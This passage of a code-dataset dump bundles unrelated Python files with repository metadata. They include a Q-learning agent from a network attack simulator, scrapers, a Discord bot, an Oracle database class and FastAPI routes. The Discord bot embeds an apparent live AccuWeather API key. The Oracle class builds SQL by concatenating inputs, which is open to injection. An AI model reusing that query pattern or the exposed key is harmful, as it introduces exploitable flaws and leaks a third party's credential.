env_step_limit_reached, _ = self.env.step(a)\n            self.steps_done += 1\n            td_error, 
s_value = self.optimize(s, a, next_s, r, done)\n            self.logger.add_scalar(\"td_error\", td_error, self.steps_done)\n            self.logger.add_scalar(\"s_value\", s_value, self.steps_done)\n\n            s = next_s\n            episode_return += r\n            steps += 1\n\n        return episode_return, steps, self.env.goal_reached()\n\n    def run_eval_episode(self,\n                         env=None,\n                         render=False,\n                         eval_epsilon=0.05,\n                         render_mode=\"human\"):\n        if env is None:\n            env = self.env\n\n        original_render_mode = env.render_mode\n        env.render_mode = render_mode\n\n        s, _ = env.reset()\n        done = False\n        env_step_limit_reached = False\n\n        steps = 0\n        episode_return = 0\n\n        line_break = \"=\"*60\n        if render:\n            print(\"\\n\" + line_break)\n            print(f\"Running EVALUATION using epsilon = {eval_epsilon:.4f}\")\n            print(line_break)\n            env.render()\n            input(\"Initial state. Press enter to continue..\")\n\n        while not done and not env_step_limit_reached:\n            a = self.get_egreedy_action(s, eval_epsilon)\n            next_s, r, done, env_step_limit_reached, _ = env.step(a)\n            s = next_s\n            episode_return += r\n            steps += 1\n            if render:\n                print(\"\\n\" + line_break)\n                print(f\"Step {steps}\")\n                print(line_break)\n                print(f\"Action Performed = {env.action_space.get_action(a)}\")\n                env.render()\n                print(f\"Reward = {r}\")\n                print(f\"Done = {done}\")\n                print(f\"Step limit reached = {env_step_limit_reached}\")\n                input(\"Press enter to continue..\")\n\n            if done or env_step_limit_reached:\n                print(\"\\n\" + line_break)\n                print(\"EPISODE FINISHED\")\n                print(line_break)\n                print(f\"Goal reached = {env.goal_reached()}\")\n                print(f\"Total steps = {steps}\")\n                print(f\"Total reward = {episode_return}\")\n\n        env.render_mode = original_render_mode\n        return episode_return, steps, env.goal_reached()\n\n\nif __name__ == \"__main__\":\n    import argparse\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"env_name\", type=str, help=\"benchmark scenario name\")\n    parser.add_argument(\"--render_eval\", action=\"store_true\",\n                        help=\"Renders final policy\")\n    parser.add_argument(\"--lr\", type=float, default=0.001,\n                        help=\"Learning rate (default=0.001)\")\n    parser.add_argument(\"-t\", \"--training_steps\", type=int, default=10000,\n                        help=\"training steps (default=10000)\")\n    parser.add_argument(\"--batch_size\", type=int, default=32,\n                        help=\"(default=32)\")\n    parser.add_argument(\"--seed\", type=int, default=0,\n                        help=\"(default=0)\")\n    parser.add_argument(\"--replay_size\", type=int, default=100000,\n                        help=\"(default=100000)\")\n    parser.add_argument(\"--final_epsilon\", type=float, default=0.05,\n                        help=\"(default=0.05)\")\n    parser.add_argument(\"--init_epsilon\", type=float, default=1.0,\n                        help=\"(default=1.0)\")\n    parser.add_argument(\"-e\", \"--exploration_steps\", type=int, default=10000,\n                        help=\"(default=10000)\")\n    parser.add_argument(\"--gamma\", type=float, default=0.99,\n                        help=\"(default=0.99)\")\n    parser.add_argument(\"--quiet\", action=\"store_false\",\n                        help=\"Run in quiet mode\")\n    args = parser.parse_args()\n\n    env = nasim.make_benchmark(\n        args.env_name,\n        args.seed,\n        fully_obs=True,\n        flat_actions=True,\n        flat_obs=True\n    )\n    ql_agent = TabularQLearningAgent(\n        env, verbose=args.quiet, **vars(args)\n    )\n    ql_agent.train()\n    ql_agent.run_eval_episode(render=args.render_eval)\n", "repo_name": "Jjschwartz/NetworkAttackSimulator", "sub_path": "nasim/agents/ql_agent.py", "file_name": "ql_agent.py", "file_ext": "py", "file_size_in_byte": 10578, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 109, "dataset": "github-code", "pt": "61", "api": [{"api_name": 
"gymnasium.error.DependencyNotInstalled", "line_number": 38, "usage_type": "call"}, {"api_name": "gymnasium.error", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 55, "usage_type": "attribute"}, {"api_name": "numpy.int", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 62, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 77, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 104, "usage_type": "attribute"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 119, "usage_type": "call"}, {"api_name": "random.random", "line_number": 135, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 137, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 280, "usage_type": "call"}, {"api_name": "nasim.make_benchmark", "line_number": 306, "usage_type": "call"}]} +{"seq_id": "22959433973", "text": "from __future__ import division\n__author__ = 'Volodymyr Varchuk'\n\n\n\n\nfrom PIL import Image\nfrom PIL.ExifTags import TAGS\nimport pprint\nimport fnmatch\nimport os\nimport exif\nimport json\n\n\ndef get_files(dir_path):\n matches = []\n for root, dirnames, filenames in os.walk(dir_path):\n print(root)\n # print(dirnames)\n print(len(filenames))\n for filename in fnmatch.filter(filenames, '*.jpg'):\n matches.append(os.path.join(root, filename))\n for filename in fnmatch.filter(filenames, '*.nef'):\n matches.append(os.path.join(root, filename))\n for filename in fnmatch.filter(filenames, '*.JPG'):\n matches.append(os.path.join(root, filename))\n for filename in fnmatch.filter(filenames, '*.NEF'):\n matches.append(os.path.join(root, filename))\n return matches\n\ndef get_exif(i):\n ret = {}\n info = i._getexif()\n if info is not None:\n for tag, value in info.items():\n decoded = TAGS.get(tag, tag)\n if decoded == 'FocalLength':\n v1, v2 = value\n value = int(v1/v2)\n if decoded == 'ExposureTime':\n v1, v2 = value\n if v1 < v2:\n value = str('1/{0}'.format(int(v2/v1)))\n else:\n value = v1/v2\n ret[decoded] = str(value)\n return ret\n\ndef get_nikon_exif(path_name):\n f = open(path_name, 'rb')\n tags = exif.process_file(f)\n f.close()\n return tags\n\n\ndef get_exif_param(exif_dict, param):\n if param in exif_dict.keys():\n return str(exif_dict[param]).strip()\n else:\n return 'None'\n\n\ndef get_exif_re(exif_dict, tag_value):\n if tag_value in exif_dict.keys():\n return str(exif_dict[tag_value])\n\ndef get_files_stats(search_dir):\n files = get_files(search_dir)\n stats = []\n for file_name in files:\n s_path = file_name.split(os.path.sep)\n skip = False\n for p_element in s_path:\n if p_element.startswith('convert'):\n skip = True\n # print(file_name, 'SKIPPED')\n if not skip:\n im = Image.open(file_name)\n if file_name.endswith('.nef') or file_name.endswith('.NEF'):\n exif_dict = get_nikon_exif(file_name)\n d_element = {}\n d_element['dir'] = os.path.sep.join(file_name.split(os.path.sep)[:-1])\n d_element['file'] = file_name\n d_element['FocalLength'] = get_exif_re(exif_dict, 'EXIF FocalLength')\n d_element['ExposureTime'] = get_exif_re(exif_dict, 'EXIF 
ExposureTime')\n                d_element['ISOSpeedRatings'] = get_exif_re(exif_dict, 'EXIF ISOSpeedRatings')\n                d_element['Make'] = get_exif_re(exif_dict, 'Image Make')\n                d_element['Model'] = get_exif_re(exif_dict, 'Image Model')\n                d_element['Date'] = get_exif_re(exif_dict, 'EXIF DateTimeDigitized')\n                d_element['Orientation'] = 'Horizontal' if get_exif_param(exif_dict, 'Image Orientation').startswith('Horizontal') else 'Vertical'\n            else:\n                exif_dict = get_exif(im)\n                d_element = {}\n                d_element['dir'] = os.path.sep.join(file_name.split(os.path.sep)[:-1])\n                d_element['file'] = file_name\n                d_element['FocalLength'] = get_exif_param(exif_dict, 'FocalLength')\n                d_element['ExposureTime'] = get_exif_param(exif_dict, 'ExposureTime')\n                d_element['ISOSpeedRatings'] = get_exif_param(exif_dict, 'ISOSpeedRatings')\n                d_element['Make'] = get_exif_param(exif_dict,'Make')\n                d_element['Model'] = get_exif_param(exif_dict,'Model')\n                d_element['Date'] = get_exif_param(exif_dict, 'DateTimeDigitized')\n                d_element['Orientation'] = 'Horizontal' if get_exif_param(exif_dict, 'Orientation') in ['1', '2', '3', '4'] else 'Vertical' # get_exif_param returns strings\n            stats.append(d_element)\n    return stats\n\n\ndef group_data(stats):\n    grouped_data = {}\n    for image_data in stats:\n        for param_name in image_data:\n            if param_name == 'file' or param_name == 'dir' or param_name == 'Date':\n                continue\n            if not param_name in grouped_data.keys():\n                grouped_data[param_name] = {} # start empty so the first occurrence is not counted twice\n            if image_data[param_name] in grouped_data[param_name].keys():\n                grouped_data[param_name][image_data[param_name]] = grouped_data[param_name][image_data[param_name]]+1\n            else:\n                grouped_data[param_name][image_data[param_name]] = 1\n    return grouped_data\n\n\ndef group_data2(stats, total_count):\n    grouped_data2 = {}\n\ndef dump_to_file(stats, file_name):\n    f_out = open(file_name, 'w')\n    headers = stats[0].keys()\n    sss = ';'.join(headers) + ';\\n'\n    f_out.write(sss)\n    for row in stats:\n        sss = ';'.join(row.values()) + ';\\n'\n        f_out.write(sss)\n    f_out.close()\n\n\nnef_file = '/media/sf_share_linux/p/DSC_0034.NEF'\njpg_file = '/media/sf_share_linux/p/DSC_0011.JPG'\n\ncsv_file = '/media/sf_share_linux/p/raw.txt'\nstat_file = '/media/sf_share_linux/p/stat.txt'\n\nprint(get_nikon_exif(nef_file))\nprint(get_exif(Image.open(jpg_file)))\npp = pprint.PrettyPrinter(indent=4)\n# search_dir = '/media/sf_All_Fotos/US Foto'\nsearch_dir = u'/media/sf_All_Fotos/US Foto/LV/Allfotos/2016-03-12_01_Road_To_SR'\n\nstats = get_files_stats(search_dir)\ndump_to_file(stats, csv_file)\ngrouped_data = group_data(stats)\npp.pprint(grouped_data)\n\nst_file = open(stat_file, 'w')\njson.dump(grouped_data, st_file)\nst_file.close()", "repo_name": "VarchukVladimir/strange_repo", "sub_path": "images_stats.py", "file_name": "images_stats.py", "file_ext": "py", "file_size_in_byte": 5615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.walk", "line_number": 18, "usage_type": "call"}, {"api_name": "fnmatch.filter", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "fnmatch.filter", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "fnmatch.filter", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": 
"call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "fnmatch.filter", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "PIL.ExifTags.TAGS.get", "line_number": 37, "usage_type": "call"}, {"api_name": "PIL.ExifTags.TAGS", "line_number": 37, "usage_type": "name"}, {"api_name": "exif.process_file", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 79, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 79, "usage_type": "name"}, {"api_name": "os.path.sep.join", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "os.path.sep.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 144, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 144, "usage_type": "name"}, {"api_name": "pprint.PrettyPrinter", "line_number": 145, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 155, "usage_type": "call"}]} +{"seq_id": "16034817213", "text": "from bs4 import BeautifulSoup\nimport requests\n\nfrom locators.route_page_locators import RoutePagePrinterLocators\nfrom parsers.photo import PhotoParser\nfrom parsers.comment import CommentParser\nfrom text_mining.text_miners import bolt_text_bad\n\n#logger = logging.getLogger('books_app.books_page')\n\nclass RoutePage:\n def __init__(self, url): #takes in entire html page from requests\n self.url = url\n content = requests.get(url+'?print=1').content\n self.soup = BeautifulSoup(content, 'html.parser')\n\n @property\n def name(self):\n locator = RoutePagePrinterLocators.NAME\n name_tag = self.soup.select(locator)[0]\n return name_tag.get_text()\n \n @property\n def description(self):\n #locator = RoutePagePrinterLocators.DESCRIPTION\n description_title_tags = self.soup.find('h3', string='Description')\n try:\n description_tag = description_title_tags.find_next_sibling('div')\n return description_tag.get_text()\n except AttributeError:\n return ''\n\n @property\n def protection(self):\n #locator = RoutePagePrinterLocators.PROTECTION\n protection_title_tags = self.soup.find('h3', string='Protection')\n try:\n protection_tag = protection_title_tags.find_next_sibling('div')\n return protection_tag.get_text()\n except AttributeError:\n return ''\n\n @property\n def photo_captions(self):\n locator = RoutePagePrinterLocators.PHOTOS\n photo_tags = self.soup.select(locator)\n return [PhotoParser(e) for e in photo_tags]\n\n @property\n def comments(self):\n locator = RoutePagePrinterLocators.COMMENTS\n comment_tags = self.soup.select(locator)\n return [CommentParser(e) for e in comment_tags]\n \n @property\n def bad_gear(self): #return dict with bool for any flags and other fields for\n flag = []\n flag += bolt_text_bad(self.description)\n flag += bolt_text_bad(self.protection)\n \n for photo in self.photo_captions:\n flag += bolt_text_bad(photo.caption)\n\n for comment in self.comments:\n flag += bolt_text_bad(comment.content)\n \n return flag\n\n", "repo_name": "hanswebster/mountain_project_bad_hardware", "sub_path": "pages/route_page.py", "file_name": "route_page.py", "file_ext": "py", "file_size_in_byte": 2239, "program_lang": "python", "lang": "en", 
"doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 14, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 15, "usage_type": "call"}, {"api_name": "locators.route_page_locators.RoutePagePrinterLocators.NAME", "line_number": 19, "usage_type": "attribute"}, {"api_name": "locators.route_page_locators.RoutePagePrinterLocators", "line_number": 19, "usage_type": "name"}, {"api_name": "locators.route_page_locators.RoutePagePrinterLocators.PHOTOS", "line_number": 45, "usage_type": "attribute"}, {"api_name": "locators.route_page_locators.RoutePagePrinterLocators", "line_number": 45, "usage_type": "name"}, {"api_name": "parsers.photo.PhotoParser", "line_number": 47, "usage_type": "call"}, {"api_name": "locators.route_page_locators.RoutePagePrinterLocators.COMMENTS", "line_number": 51, "usage_type": "attribute"}, {"api_name": "locators.route_page_locators.RoutePagePrinterLocators", "line_number": 51, "usage_type": "name"}, {"api_name": "parsers.comment.CommentParser", "line_number": 53, "usage_type": "call"}, {"api_name": "text_mining.text_miners.bolt_text_bad", "line_number": 58, "usage_type": "call"}, {"api_name": "text_mining.text_miners.bolt_text_bad", "line_number": 59, "usage_type": "call"}, {"api_name": "text_mining.text_miners.bolt_text_bad", "line_number": 62, "usage_type": "call"}, {"api_name": "text_mining.text_miners.bolt_text_bad", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "30872633938", "text": "import json\n\nimport httplib2\nimport yaml\n\n\ndef get_todays_links(link, today):\n config = yaml.load(open('config.yaml'))\n links = []\n\n h = httplib2.Http()\n (resp_headers, content) = h.request(link, 'get')\n try:\n all_data = json.loads(content.decode('utf-8-sig'))[0][today]\n for data in all_data:\n links.append(config['nhk_root'] + data['news_id'] + '/'\n + data['news_id'] + '.html')\n\n return links\n except Exception as e:\n print(e)\n print('No links yet for today')\n return []", "repo_name": "JMoravec/NHKEasyRSS", "sub_path": "get_todays_links.py", "file_name": "get_todays_links.py", "file_ext": "py", "file_size_in_byte": 568, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "yaml.load", "line_number": 8, "usage_type": "call"}, {"api_name": "httplib2.Http", "line_number": 11, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "8840726939", "text": "import discord\nimport os\nimport time\nfrom bs4 import BeautifulSoup\nfrom discord import state\nimport requests\nfrom dotenv import load_dotenv\nload_dotenv(\".env\")\n\nclient = discord.Client()\n@client.event\nasync def on_ready():\n print(\"We have logged in as {0.user}\".format(client))\n\n@client.event\n\nasync def on_message(msg):\n if msg.author==client.user:\n return\n if msg.content.startswith(\"$weather\"):\n resp = requests.get(\"http://dataservice.accuweather.com/forecasts/v1/hourly/1hour/193826?apikey=2A7yNWDokHDYBNQuyRJVYvgrdeg58flk%20&language=en-us&details=true&metric=true\")\n await msg.channel.send(resp.json()[0]['RainProbability'])\n await msg.channel.send(\" - Rain probability\")\n if msg.content.startswith(\"$sc\"):\n sc = msg.content[3:]\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36'}\n url2 = \"https://cdn-api.co-vin.in/api/v2/admin/location/districts/{}\".format(sc)\n resp2 = 
requests.get(url2, headers=headers)\n data2 = resp2.json()['districts']\n await msg.channel.send(\"district codes acording to state you selected \")\n for d in data2:\n await msg.channel.send(d)\n await msg.channel.send(\"enter in following format : '$cowin disctrict_code date_dd-mm-yyyy'\")\n if msg.content.startswith(\"$cowin\"):\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36'}\n if len(msg.content) == 6:\n await msg.channel.send(\"State codes are \")\n url3 = \"https://cdn-api.co-vin.in/api/v2/admin/location/states\"\n resp3 = requests.get(url3,headers=headers)\n data3 = resp3.json()['states']\n for states in data3:\n await msg.channel.send(states)\n await msg.channel.send(\"Enter your state code as $sc'statecode'\")\n \n dis = msg.content[7:10]\n date = msg.content[11:21]\n url1 = \"https://cdn-api.co-vin.in/api/v2/appointment/sessions/public/findByDistrict?district_id={}&date={}\".format(dis,date)\n \n resp1 = requests.get(url1,headers=headers)\n data = resp1.json()['sessions']\n\n for x in data:\n c = x['available_capacity']\n a = x['address']\n if c>0:\n await msg.channel.send(a)\n await msg.channel.send(\"available dose : {}\".format(c))\nclient.run(os.environ.get('newtoken'))", "repo_name": "adarshg98765/bot1", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2356, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 8, "usage_type": "call"}, {"api_name": "discord.Client", "line_number": 10, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 28, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 39, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 49, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 58, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 58, "usage_type": "attribute"}]} +{"seq_id": "41772166865", "text": "# -*- coding:utf-8 -*-\n\n__author__ = 'wenbin'\n\nfrom selenium import webdriver\nfrom gne import GeneralNewsExtractor\nfrom time import sleep\nimport csv\n\n\"\"\"switch to new open window\n\"\"\"\ndef switch_new_window():\n all_handles = browser.window_handles\n current_handle = browser.current_window_handle\n for new_handle in all_handles:\n if new_handle != current_handle:\n browser.switch_to.window(new_handle)\n\n\nfile = open('/files/sogou_news_data.csv', 'w', encoding='utf-8-sig')\nwriter = csv.writer(file)\nwriter.writerow(('新闻标题','新闻发布时间','新闻作者','新闻正文','新闻插图'))\n\n# 搜索关键词\nkeyword = \"托育\"\n\n# 驱动,打开头条门户首页\nbrowser = webdriver.Chrome(\"/usr/local/bin/chromedriver\")\nbrowser.get(\"https://www.sogou.com/sogou?ie=utf8&interation=1728053249&interV=&pid=sogou-wsse-9fc36fa768a74fa9&mode=1&p=31040300&query={}\".format(keyword))\nsleep(3)\n\nfor i in range(1,11):\n browser.find_element_by_xpath('/html/body/div[3]/div[2]/div[1]/div[2]/div/div[{}]/div/h3/a'.format(i)).click()\n switch_new_window()\n extractor = GeneralNewsExtractor()\n result = extractor.extract(browser.page_source)\n writer.writerow((result['title'], result['publish_time'], result['author'], result['content'], result['images']))\n browser.close()\n browser.switch_to.window(browser.window_handles[0])\n\nsleep(3)\nbrowser.quit()", "repo_name": "chenwenbin69/spider", "sub_path": "spiders/sogou.py", 
"file_name": "sogou.py", "file_ext": "py", "file_size_in_byte": 1391, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "csv.writer", "line_number": 21, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 28, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 28, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 30, "usage_type": "call"}, {"api_name": "gne.GeneralNewsExtractor", "line_number": 35, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "73515102913", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n'''\ntitle: Definicion del la clase BBDD\n\nAutor: Erick Cruz Cedeño\n'''\n#importamos librerias y clases necesarias\nimport cx_Oracle\nfrom vuelo import Vol\nfrom seient import Seient\n\n#Definicion clase BBDD, Esta nos permitira realizar consulta sql, en la cual podremoas obtener vuelos, asientos, etc..\nclass BBDD:\n #modifiqueu usuari i contrasenya pel que correspongui\n usuari = \"your id\"\n contrasenya = \"your password\"\n conn = None\n\n def obreConnexio(self): #permite conectarnos con el oracle\n dsn_tns = cx_Oracle.makedsn('sab-oracle.uab.es','1521', service_name='polux')\n self.conn = cx_Oracle.connect(user=self.usuari, password=self.contrasenya, dsn=dsn_tns)\n\n def tancaConnexio(self): #permite cerrar la coneccion con aracle\n self.conn.close()\n\n # donat un codi d'aeroport, retorna el nom de l'aeroport\n def obteNomAeroport(self,codiAero):\n self.obreConnexio() # abre la coneccion en els ervidor de oracle\n try: #intenta realizar lo que hay dentro del sangriado y si hay algun fallo, pasara al except\n cur = self.conn.cursor() #intenta conectar\n cur.execute(\"select nom from aeroport where codi_aeroport = '\" + codiAero + \"'\") # 2n forma (bind variables): cur.execute(\"SELECT * FROM mytab WHERE mycol = :mybv\", mybv=myvar)\n n_aerop = \"\" # creo un varible vacia dnd se guardara el aeropueto que concida con su codigo\n for i in cur: # recorro cur donde almacena la sql query\n n_aerop = i[0] # guardo el el resultado en la varible\n cur.close() # cierro y desconectamos coneccion\n self.tancaConnexio() # cirra la coneccion con oracle\n return n_aerop # retornamos la varible con el nombre del aeropuerto\n except: # si hay algun error en las lineas de try, pasara al except\n self.tancaConnexio() # cerrara la connecion\n\n # obetenemos un lista de asientos, realizando una consulta dando por parametro el codigo y la fecha del vuelo\n def obteLlistaSeients(self,codivol,data):\n self.obreConnexio() #abre la coneccion en els ervidor de oracle\n try: #intenta ejecutar lo que hay dentro del sangriado\n cur = self.conn.cursor() #abre coneccion con oreacle\n #executem la consulta SQL. combinem text fix amb text que ens passen per parà metre\n data = data.date() #data(), perimite que si la fecha esta en formato dia,mes,año y horas solo coguera la yyyy-mm-dd\n cur.execute(\"select fila, lletra from seient where codi_vol= '\" +codivol+ \"' and data=to_date('\" +str(data)+ \"', 'yyyy-mm-dd')\") #ejecutamos la consulta sql\n #creem una llista buida que contindrà tots els seients del vol\n llista = [] #lista vacia donde se guardaran los asientos de la consulta\n #la consulta podria retornar diverses files. 
les recorrem\n            for tupla in cur:\n                #per cada fila, podem obtenir les columnes\n                #en aquest exemple, la columna fila és la primera, i la lletra la segona\n                seat = Seient() #creamos un objeto seient\n                seat.readBBDD(tupla[0],tupla[1]) #permite atribuir el asineto con su fila y letra\n                llista.append(seat) #este asiento se inserta en la lista\n            cur.close() #cierra la consulta\n            #retornem la llista\n            #és una llista de llistes: per a cada tupla, conté dos camps: la fila i la lletra\n            self.tancaConnexio() #al finalizar el recorrido, se cerrara la conneccion con oracle\n            return llista #retorna la lista con los asientos de la consulta generada\n        except: #en caso que no se pueda conectar, cierra la connecion\n            self.tancaConnexio()\n\n    # donat un codi d'aeroport, obté el codi, la data, la companyia, el tipus d'avió, la destinacio i l'origen\n    # el codi d'aeroport pot ser tant d'origen com de destí\n    def obteLlistaVols(self,codiaero):\n        self.obreConnexio() #abre la conneccion en oracle\n        try: #intentamos ejecutar la parte del try y si hay algun fallo, pasara al except\n            cur = self.conn.cursor() #abre coneccion con oreacle\n            # sql query, los codigos de vuelos que tiene como origen BCN\n            cur.execute(\"select codi_vol, data, companyia, tipus_avio, origen, destinacio from vol where origen = '\" +codiaero+\"'\")\n            l=[] #lista vacia donde se guaradaran los vuelos de la sql query\n            for i in cur: #recorremos la sql query\n                v=Vol() #creamos un objeto vuelo\n                v.readVolBBDD(i[0],i[1],i[2],i[3],i[4],i[5]) # Atribuimos el vuelo con sus atributos\n                l.append(v) #añadimos el vuelo a lista de vuelos\n            #sql query, los codigos de vuelos que tiene como destino BCN\n            cur.execute(\"select codi_vol, data, companyia, tipus_avio, destinacio, origen from vol where destinacio = '\" + codiaero + \"'\")\n            for i in cur: #recorremos la sql query\n                v = Vol() #creamos un objeto vuelo\n                v.readVolBBDD(i[0], i[1], i[2], i[3], i[5], i[4]) # Atribuimos el vuelo con sus atributos\n                l.append(v) #añadimos el vuelo a lista de vuelos\n            cur.close() #cierra la consulta\n            self.tancaConnexio() #al finalizar el recorrido, se cerrara la conneccion con oracle\n            return l #retorna la lista con los veulos de la sql query\n        except:\n            self.tancaConnexio()\n", "repo_name": "Crzek/RAsientos", "sub_path": "bbdd.py", "file_name": "bbdd.py", "file_ext": "py", "file_size_in_byte": 5616, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "cx_Oracle.makedsn", "line_number": 21, "usage_type": "call"}, {"api_name": "cx_Oracle.connect", "line_number": 22, "usage_type": "call"}, {"api_name": "seient.Seient", "line_number": 56, "usage_type": "call"}, {"api_name": "vuelo.Vol", "line_number": 77, "usage_type": "call"}, {"api_name": "vuelo.Vol", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "74250274753", "text": "import os\r\nimport openai\r\nopenai.api_key = \"apikey\"\r\ndef completion(prompt):\r\n    completions = openai.Completion.create(\r\n        engine=\"text-davinci-002\",\r\n        prompt=prompt,\r\n        max_tokens=1024,\r\n        n=1,\r\n        stop=None,\r\n        temperature=0.5,\r\n    )\r\n    message = completions.choices[0].text\r\n    return message\r\npath = \"linux_suorce_code20230214\\\\block\\\\bfq-cgroup.c\"\r\ntopath = \"linux_go_20230214\\\\block\\\\bfq-cgroup.go\"\r\nctext = open(path,\"r\").read()\r\n#print(ctext)\r\ngotext = completion(\"请把 \"+ctext+\" 翻译成 golang语言版本\")\r\nf=open(topath,\"w\")\r\nf.write(gotext)\r\nf.close()", "repo_name": "leonglaung/linux-kernel-golang-chatgpt", "sub_path":
"chatgpt04.py", "file_name": "chatgpt04.py", "file_ext": "py", "file_size_in_byte": 586, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "openai.api_key", "line_number": 3, "usage_type": "attribute"}, {"api_name": "openai.Completion.create", "line_number": 5, "usage_type": "call"}, {"api_name": "openai.Completion", "line_number": 5, "usage_type": "attribute"}]} +{"seq_id": "2984470451", "text": "from socket import socket\nfrom config import host_port\n\n\nclass Client:\n def __init__(self, host_port, work=False):\n self.con = socket()\n self.con.connect(host_port)\n self.work = work\n\n def run(self):\n while True:\n msg = input()\n self.con.send(bytes(msg, encoding=\"utf-8\"))\n if msg == \"bb\":\n break\n print(self.con.recv(1024))\n self.con.close()\n\n\nif __name__ == '__main__':\n Client(host_port).run()\n", "repo_name": "N1k0lay78/one_thread_server", "sub_path": "ChatClient.py", "file_name": "ChatClient.py", "file_ext": "py", "file_size_in_byte": 500, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "socket.socket", "line_number": 7, "usage_type": "call"}, {"api_name": "config.host_port", "line_number": 8, "usage_type": "argument"}, {"api_name": "config.host_port", "line_number": 22, "usage_type": "argument"}]} +{"seq_id": "71812573314", "text": "from fastapi import status, HTTPException, Depends, APIRouter, Response\nfrom dbhelper import runSQL, runSQL_return_id\nfrom pydantic import BaseModel\nfrom oauth2 import get_current_user\n\nfrom project_helper import project_exist\n\n# tags are just for the ui\napp = APIRouter(tags=['technologies'])\n\nclass UserSkill(BaseModel):\n user_skills : dict[int,int]\n\n\n\n@app.get(\"/technologies\", status_code = status.HTTP_200_OK)\ndef get_all_technologies(user_id : int = Depends(get_current_user)):\n\n\n # get all technologies\n res = runSQL(\"SELECT * FROM technologies\")\n\n return res\n\n\n@app.put(\"/user_technologies\", status_code = status.HTTP_200_OK)\ndef get_all_technologies(skills : UserSkill, user_id : int = Depends(get_current_user)):\n\n\n for tech_id in skills.user_skills:\n print(tech_id , skills.user_skills[tech_id])\n res = runSQL(\"UPDATE users_technologies SET technology_experience = %s WHERE technology_id = %s AND user_id = %s\", (skills.user_skills[tech_id], tech_id, user_id))\n #print(res)\n\n # get all technologies\n\n return res\n ", "repo_name": "codeyescity/dev-community", "sub_path": "backend/routes/technologies.py", "file_name": "technologies.py", "file_ext": "py", "file_size_in_byte": 1068, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fastapi.APIRouter", "line_number": 9, "usage_type": "call"}, {"api_name": "pydantic.BaseModel", "line_number": 11, "usage_type": "name"}, {"api_name": "fastapi.Depends", "line_number": 17, "usage_type": "call"}, {"api_name": "oauth2.get_current_user", "line_number": 